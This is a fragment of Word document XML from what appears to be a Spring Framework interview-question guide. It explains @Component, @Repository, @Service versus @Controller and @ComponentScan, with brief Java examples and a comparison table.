          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> into the roles of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591F85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 (web layer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294612A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 (business layer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004666B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data access layer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DE357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20FC09">
          <v:rect id="_x0000_i2544" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B70E86"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Component makes a class eligible for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>auto-detection and dependency injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by Spring. It's a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>general-purpose annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for defining Spring beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7529EE49" w14:textId="61F5704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545" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="771261EF" w14:textId="3F1AB1CB" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="607" w:name="_Toc197867821"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is the use of @Repository annotation in spring?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="607"/>
    </w:p>
    <w:p w14:paraId="4F1B457D" w14:textId="0A3FFFE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pository annotation in Spring is used to indicate that a class is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data access layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, typically responsible for interacting with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>database</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6445AAF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8A11B">
          <v:rect id="_x0000_i2546" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBCCEC6"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Repository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695564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0BF337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it handles </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CRUD operations or database interaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA9C93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exception translation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (converts low-level persistence exceptions into Spring’s DataAccessException hierarchy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6898555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E9674C">
          <v:rect id="_x0000_i2547" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="370F8E3A"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6AD01EC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4D3ADFF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Repository {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ADD40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getEmployeeById(int id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ABE23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JDBC or ORM code to fetch employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E12315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AFCD7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0ED396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r when using Spring Data JPA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C063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2AB56CE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Integer&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D20BB0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BB4E4B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C83F5">
          <v:rect id="_x0000_i2548" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B66DF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y use it over @Component?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A636E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Component also registers the class as a Spring bean, @Repository is more </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>semantically specific</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and enables features like </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exception translation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is not available with @Component.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9564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F346E">
          <v:rect id="_x0000_i2549" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07463CD8"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Repository is used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>annotate DAO classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and provides Spring-specific functionalities like </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exception handling and bean registration</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for persistence-related logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E74FA11" w14:textId="5E3BD92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550" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0705528E" w14:textId="1D9E8428" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB2AAE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="608" w:name="_Toc197867822"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the difference between @Service and @Controller annotation</w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="608"/>
    </w:p>
    <w:p w14:paraId="1F9B5920" w14:textId="06F25968" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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613"/>
        <w:gridCol w:w="4026"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="0C18F925" w14:textId="77777777" w:rsidTr="009F6D6F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25B6E33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743860FE"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ervice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31EDD534"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r>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="5562E360" w14:textId="77777777" w:rsidTr="009F6D6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="351ABE5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ayer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E049E1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usiness/Service Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7230CE2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eb/Presentation Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="4FF5A932" w14:textId="77777777" w:rsidTr="009F6D6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DB9A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67784D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ains business logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D3F498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andles HTTP requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="6F362956" w14:textId="77777777" w:rsidTr="009F6D6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E68D0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612FF6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returns data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11DD3B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views or response bodies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="7E8D0762" w14:textId="77777777" w:rsidTr="009F6D6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BDCBF7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Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EA99EA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service provider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C39556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web controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="3BA37E24" w14:textId="77777777" w:rsidTr="009F6D6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03612DB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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4222B92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 directly exposed to HTTP responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49256B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cesses incoming HTTP requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="37585CC3" w14:textId="77777777" w:rsidTr="009F6D6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A2AF9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al Behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DAAF1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Transactional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11EFCB5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orks with @RequestMapping or REST APIs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="1BFE669B" w14:textId="77777777" w:rsidTr="009F6D6F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53EB79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nnotation Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B9B941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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A8C1B4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r>
    </w:tbl>
    <w:p w14:paraId="09B3018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AE3A9">
          <v:rect id="_x0000_i2551" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="334F75B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Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A647C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C004E2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42C2843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3B56C9E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8BBA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A88DEF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FDED44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62821E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34D620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15B347D6" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19D7874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C6E756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rivate EmployeeService employeeService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349AE7DB" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35BD84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name")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4299373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Model model) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE952C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name", employeeService.getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3418EB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View";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1896E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9616B8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96673C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7CAA3A">
          <v:rect id="_x0000_i2552" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7393E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p>
    <w:p w14:paraId="5EFE924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Service to define business logic classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673ED44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Controller to handle web requests and route them to appropriate views or responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463A82E9" w14:textId="196B07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553" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE0029E" w14:textId="4FFC0665" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB2AAE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="609" w:name="_Toc197867823"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is @ComponentScan</w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="609"/>
    </w:p>
    <w:p w14:paraId="357DA8A0" w14:textId="42E557D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mponentScan is a Spring annotation used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>specify the packages</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to scan for Spring-managed components (beans) like classes annotated with @Component, @Service, @Repository, or @Controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BAD45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DF864">
          <v:rect id="_x0000_i2554" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A703199"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0D2B6BF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matically detects and registers beans into the Spring </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D98A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t helps in </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>component scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> so you don’t have to declare beans manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AC74B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EBB5D">
          <v:rect id="_x0000_i2555" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1406543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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D9A39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5668B8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project")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A02F36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0E3FEBC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54581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tells Spring to scan the package com.example.project and its sub-packages for annotated classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16869CB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76D0FB">
          <v:rect id="_x0000_i2556" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4535EFD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413E03A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looks for classes annotated with stereotypes (@Component, @Service, etc.) in the specified package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031E4E7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then registers them as beans in the container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB52BA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BD9C5">
          <v:rect id="_x0000_i2557" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D58B29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Default Behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC8EEB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don’t specify basePackages, Spring scans the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>current package and sub-packages</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the class where @ComponentScan is declared.</w:t>
      </w:r>
    </w:p>
